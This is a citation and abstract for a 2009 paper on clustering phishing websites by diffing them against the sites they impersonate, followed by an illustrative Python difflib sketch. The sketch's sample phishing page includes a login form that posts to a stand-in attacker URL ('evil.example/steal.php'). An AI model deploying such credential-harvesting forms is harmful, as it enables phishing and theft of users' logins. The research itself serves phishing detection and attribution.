Using Differencing to Increase Distinctiveness for Phishing Website Clustering

  • Authors:
  • Robert Layton; Simon Brown; Paul Watters

  • Venue:
  • UIC-ATC '09 Proceedings of the 2009 Symposia and Workshops on Ubiquitous, Autonomic and Trusted Computing
  • Year:
  • 2009

Abstract

Phishing webpages are a previously underused source of information for determining the provenance of phishing attacks. Phishing webpages aim to impersonate a legitimate website in order to trick potential victims into revealing confidential data, such as usernames and passwords. However, different phishing webpages often contain small differences, and these differences can provide a great deal of evidence on the provenance of phishing attacks. When a webpage is impersonated, much of the original website is reproduced in the phishing website, so there is often a large amount of 'redundant' information, which makes phishing websites from different attacks very similar. To overcome this issue, a diff can be used that takes the phishing and original websites as input and returns the differences between the two. These differences present a view of the data that was previously unused and a novel way to increase the ability of clustering algorithms to find good, distinct and well-separated clusters within the data. The research presented here outlines this diff process and shows that, for the data used, comparable results were obtained while the dimensionality of the dataset was reduced. This reduced dimensionality allows clustering algorithms to complete faster.
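
The diff step described in the abstract can be illustrated with a minimal sketch. The abstract does not say which diff algorithm or granularity the authors used, so the line-based comparison with Python's standard `difflib` module is an assumption made here for illustration. The function name `page_diff`, the sample pages and the URLs in them are all hypothetical.

```python
import difflib
from typing import List


def page_diff(original_html: str, phishing_html: str) -> List[str]:
    """Return the non-empty lines that the phishing page adds or changes
    relative to the original page (line-based diff; an assumed granularity)."""
    original_lines = [line.strip() for line in original_html.splitlines()]
    phishing_lines = [line.strip() for line in phishing_html.splitlines()]
    matcher = difflib.SequenceMatcher(
        a=original_lines, b=phishing_lines, autojunk=False
    )
    changed = []
    for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
        # "replace" and "insert" cover content found only in the phishing page.
        if tag in ("replace", "insert"):
            changed.extend(line for line in phishing_lines[j1:j2] if line)
    return changed


# Hypothetical sample pages: the phishing copy changes the form target
# and adds one comment line; everything else is copied from the original.
ORIGINAL = """<html>
<body>
<form action="https://bank.example/login">
</form>
</body>
</html>"""

PHISHING = """<html>
<body>
<form action="http://evil.example/steal.php">
</form>
<!-- kit v2 -->
</body>
</html>"""

if __name__ == "__main__":
    for line in page_diff(ORIGINAL, PHISHING):
        print(line)
```

In this sketch only the two lines unique to the phishing copy survive, while the markup shared with the original is discarded. Features for clustering would then be extracted from this smaller residue instead of the full page, which is one plausible reading of how the reduced dimensionality mentioned in the abstract arises.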